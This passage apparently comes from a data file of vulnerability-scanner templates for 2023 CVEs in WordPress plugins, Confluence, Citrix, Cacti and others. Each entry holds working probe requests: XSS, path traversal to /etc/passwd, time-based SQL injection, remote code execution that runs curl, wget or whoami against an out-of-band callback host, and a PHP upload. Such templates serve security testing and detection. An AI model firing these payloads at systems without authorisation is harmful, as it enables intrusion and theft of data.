statement\",\"NoSuchFileException\")","status_code_2 == 400"],"condition":"and"}]}]},{"id":"CVE-2023-6389","info":{"name":"WordPress Toolbar <= 2.2.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-6623","info":{"name":"Essential Blocks < 4.4.3 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={\"__file\":\"/etc%2fpasswd\"}","{{BaseURL}}/wp-content/plugins/essential-blocks/readme.txt"],"matchers":[{"type":"dsl","dsl":["status_code == 200","regex('root:.*:0:0:', body_1)","contains(body_2, \"Essential Blocks \u2013 Page\")"],"condition":"and"}]}]},{"id":"CVE-2023-29623","info":{"name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{randstr}}&password=%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","incorrect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24737","info":{"name":"PMB v7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35162","info":{"name":"XWiki < 14.10.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=previewactions.vm&xcontinue=javascript:alert(document.domain)"],"matchers":[{"type":"dsl","dsl":["contains(body, \"name=\\\"xcontinue\\\" value=\\\"javascript:alert(document.domain)\")","contains(body, \"previewactions.vm\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-37679","info":{"name":"NextGen Mirth Connect - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/server/version HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\n","POST /api/users HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\nContent-Type: application/xml\n\n<sorted-set>\n    <string>foo</string>\n    <dynamic-proxy>\n        <interface>java.lang.Comparable</interface>\n        <handler class=\"java.beans.EventHandler\">\n            <target class=\"java.lang.ProcessBuilder\">\n                <command>\n                    <string>curl</string>\n                    <string>http://{{interactsh-url}}/</string>\n                </command>\n            </target>\n            <action>start</action>\n        </handler>\n    </dynamic-proxy>\n</sorted-set>\n"],"matchers":[{"type":"dsl","dsl":["compare_versions(version, \"<4.4.1\")","contains(interactsh_protocol, \"dns\")","status_code_1 == 200 && status_code_2 == 500"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"version","group":1,"regex":["(.*)"],"internal":true}]}]},{"id":"CVE-2023-20073","info":{"name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /index.html HTTP/1.1\nHost: {{Hostname}}\n","POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1\nHost: {{Hostname}}\nAuthorization: 1\nContent-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf\n\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"pathparam\"\n\nPortal\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"fileparam\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file.path\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file\"; filename=\"index.html\"\nContent-Type: application/octet-stream\n\n{{index}}\n{{html_comment}}\n\n--------------------------f6f99e26f3a45adf--\n","GET /index.html HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"dsl","name":"index","internal":true,"dsl":["body_1"]}],"matchers":[{"type":"word","part":"body_3","words":["{{html_comment}}"]}]}]},{"id":"CVE-2023-44813","info":{"name":"mooSocial v.3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(document.domain)%2f%2f;'"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["initInviteFriendBtn('model');alert(document.domain)//;"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5830","info":{"name":"ColumbiaSoft DocumentLocator - Improper Authentication","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /api/authentication/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n{\n  \"LoginType\":\"differentWindows\",\n  \"User\":\"{{randstr}}\",\n  \"Password\":\"{{rand_base(5, \"abc\")}}\",\n  \"Domain\":\"{{randstr}}\",\n  \"Server\":\"{{interactsh-url}}\",\n  \"Repository\":\"{{randstr}}\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"Authorized\":false"]}]}]},{"id":"CVE-2023-35082","info":{"name":"MobileIron Core - Remote Unauthenticated API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/asfV3/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-31059","info":{"name":"Repetier Server - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"],"matchers-condition":"and","matchers":[{"type":"binary","part":"body","binary":["53514C69746520666F726D6174203300"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27292","info":{"name":"OpenCATS - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=settings&a=previewPage&url=https://oast.me HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>Page Preview</TITLE>","<FRAME src=\"https://oast.me\">"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27584","info":{"name":"Dragonfly2 < 2.1.0-beta.1 - Hardcoded JWT Secret","severity":"critical"},"requests":[{"raw":["GET /api/v1/users HTTP/1.1\nHost: {{Hostname}}\nCookie: jwt={{generate_jwt(payload,\"HS256\",\"Secret Key\") }}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"created_at\":","\"updated_at\":","\"state\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1892","info":{"name":"Sidekiq < 7.0.8 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/queues"],"matchers":[{"type":"word","internal":true,"part":"body","words":["Sidekiq","Dashboard</a>"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E","{{BaseURL}}/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E","{{BaseURL}}/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img/src/onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39108","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/crud/configcompare.crud.php?path_b=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["rConfig"]},{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"status","part":"header_3","status":[200]}]}]},{"id":"CVE-2023-37270","info":{"name":"Piwigo 13.7.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: '\">{{7*7}}${2*2}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=user_activity HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Warning: [mysql error","INSERT  INTO","SQL syntax;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24488","info":{"name":"Citrix Gateway and Citrix ADC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E","{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<body x='&'onload=\"(alert)('citrix akamai bypass')\">","<script>alert(document.domain)</script>"],"condition":"or"},{"type":"word","part":"body","words":["Content-Type: text/html"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-24278","info":{"name":"Squidex <7.4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","looking for!"],"condition":"and"},{"type":"word","part":"header","words":["image/svg+xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29827","info":{"name":"Embedded JavaScript(EJS) 3.1.6 - Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27)%3b//"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2023-46359","info":{"name":"cPH2 Charging Station v1.87.0 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/connectioncheck.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["<b>SUCCESS</b>","127.0.0.1 && curl http://$(whoami).{{interactsh-url}}"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-34751","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=user&page=groups&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=User&backend=0&content=0&settings=0&permissions=0&tools=0&demo=0&gid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&name_old=User&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-27008","info":{"name":"ATutor < 2.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /atutor/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntoken=asdf\");}alert(document.domain);+function+asdf()+{//\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[");}alert(document.domain); function","ATutor","Login"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0261","info":{"name":"WordPress WP TripAdvisor Review Slider <10.8 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid=\"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)\"]\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"\\\"data\\\":{\")"],"condition":"and"}]}]},{"id":"CVE-2023-34843","info":{"name":"Traggo Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2745","info":{"name":"WordPress Core <=6.2 - Directory Traversal","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins\")"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-login.php?wp_lang=../../../../../../../wp-config.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_2, \"DB_NAME\", \"DB_PASSWORD\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-24657","info":{"name":"phpIPAM - 1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /app/login/login_check.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipamusername={{username}}&ipampassword={{password}}\n","GET /app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"Subnet masks\")"],"condition":"and"}]}]},{"id":"CVE-2023-5556","info":{"name":"Structurizr on-premises - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /signin HTTP/1.1\nHost: {{Hostname}}\n","POST /login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&_csrf={{csrf}}&hash=\n","GET /dashboard HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /workspace/create HTTP/1.1\nHost: {{Hostname}}\n","GET /workspace/{{workspace}}/?version={{str}}%22);alert(document.domain);// HTTP/1.1\nHost: {{Hostname}}\n"],"attack":"pitchfork","payloads":{"username":["structurizr"],"password":["password"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<a href=\"/dashboard\">","Sign out"],"condition":"and"},{"type":"word","part":"body_5","words":["\");alert(document.domain);//","Structurizr"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"([0-9a-z-]+)\""],"internal":true},{"type":"regex","name":"workspace","group":1,"part":"header","regex":["\\/workspace\\/([0-9]+)\\?scriptNonce="],"internal":true}]}]},{"id":"CVE-2023-5360","info":{"name":"WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=wpr_addons_upload_file HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236\n\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"uploaded_file\"; filename=\"{{file}}.ph$p\"\nContent-Type: image/png\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"allowed_file_types\"\n\nph$p\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"triggering_event\"\n\nclick\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"wpr_addons_nonce\"\n\n{{nonce}}\n-----------------------------318949277012917151102295043236--\n","GET /wp-content/uploads/wpr-addons/forms/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["WprConfig\\s*=\\s*{[^}]*\"nonce\"\\s*:\\s*\"([^\"]*)\""],"internal":true},{"type":"regex","name":"filename","part":"body_2","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/wpr-addons\\\\\\/forms\\\\\\/(.*?).php"],"internal":true}]}]},{"id":"CVE-2023-39007","info":{"name":"OPNsense - Cross-Site Scripting to RCE","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{para}}={{value}}&usernamefld={{username}}&passwordfld={{password}}&login=1\n","GET /ui/cron/item/open/0'+alert(document.domain)+' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["openDialog('0'+alert(document.domain)+''"]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"para","part":"body","group":1,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true},{"type":"regex","name":"value","part":"body","group":2,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true}]}]},{"id":"CVE-2023-2796","info":{"name":"EventON <= 2.1 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-50290","info":{"name":"Apache Solr - Host Environment Variables Leak via Metrics API","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/solr/admin/metrics"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"responseHeader\":","\"solr.jetty\":","system.env"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5914","info":{"name":"Citrix StoreFront - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/Citrix/teststoreAuth/SamlTest"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"SAMLResponse=q1YKdvT1CUotLsjPK05VskLhBrhHlSVVOpkkhZebJRs7ZUQahVp6ZkYVp7iUVEUaexUkewTmRhkHmkeGV%2bQk5wXm%2bwZn5yZ5BJr7GPtlJefmlKc4R%2bWluBRnBmSVl0XlWpYFpNvaKtUCAA%3d%3d","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"<script>alert(1)</script>\", \"XmlException\")"],"condition":"and"}]}]},{"id":"CVE-2023-47684","info":{"name":"Essential Grid <= 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=Essential_Grid_Front_request_ajax&client_action=load_post_content&postid=1&settings={%22lbMax%22:%22\\%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%22} HTTP/2\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","lightbox"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0563","info":{"name":"Bank Locker Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-locker-details.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"/><script>alert(document.domain)</script>\")","contains(body, \"Bank Locker Management System\")"],"condition":"and"}]}]},{"id":"CVE-2023-39361","info":{"name":"Cacti 1.2.24 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=10","status_code == 200","contains_all(body, \"Tree Mode\", \"cacti\")"],"condition":"and"}]}]},{"id":"CVE-2023-30210","info":{"name":"OURPHP <= 7.2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","barmemCachedPercent","swapPercent"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4973","info":{"name":"Academy LMS 6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/academy/tutor/filter?searched_word=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0&searched_tution_class_type%5B%5D=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0&price_min=1&price_max=9&searched_price_type%5B%5D=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0&searched_duration%5B%5D=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"<script>alert(document.domain)</script>\", \"List of tuitions\")"],"condition":"and"}]}]},{"id":"CVE-2023-0777","info":{"name":"modoboa  2.0.4 - Admin TakeOver","severity":"critical"},"requests":[{"raw":["GET /accounts/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /accounts/login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrftoken}}&username={{username}}&password={{password}}&next=%2F\n","GET /dashboard/ HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"username":["admin"],"password":["password"]},"attack":"pitchfork","host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"Dashboard\") && contains(body_3, \"Hello admin\")"],"condition":"and"}],"extractors":[{"type":"regex","part":"header","name":"csrftoken","internal":true,"group":1,"regex":["csrftoken=([A-Za-z0-9]+)"]}]}]},{"id":"CVE-2023-50719","info":{"name":"XWiki < 4.10.15 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale=","{{BaseURL}}/xwiki/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale="],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["hash:SHA</span>","XWikiUsers[0].password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22527","info":{"name":"Atlassian Confluence - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /template/aui/text-inline.vm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate, br\nContent-Type: application/x-www-form-urlencoded\n\nlabel=aaa\\u0027%2b#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.poc[0],{})%2b\\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\\u0027x_vuln_check\\u0027,(new+freemarker.template.utility.Execute()).exec({\"whoami\"}))\n\n"],"matchers":[{"type":"dsl","dsl":["x_vuln_check != \"\"","contains(to_lower(body), 'empty{name=')"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["x_vuln_check"]}]}]},{"id":"CVE-2023-23488","info":{"name":"WordPress Paid Memberships Pro <2.9.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nGET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=7","status_code_1 != 403","contains(body_2, \"pmpro_updates\")"],"condition":"and"}]}]},{"id":"CVE-2023-29298","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-22897","info":{"name":"Securepoint UTM - Leaking Remote Memory Contents","severity":"medium"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"sessionid\":","\"mode\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34752","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=settings&page=lang&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=English&flag=en.gif&filename=english.php&date=m%2Fd%2FY&datetime=m%2Fd%2FY+-+H%3Ai&token=en&lid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-43472","info":{"name":"MLFlow < 2.8.1 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/2.0/preview/mlflow/experiments/list"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"experiment_id\\\":\", \"artifact_location\\\":\", \"lifecycle_stage\\\":\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-40504","info":{"name":"LG Simple Editor <= v3.21.0 - Command Injection","severity":"critical"},"requests":[{"raw":["GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"LG Simple Editor\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadVideo\"; 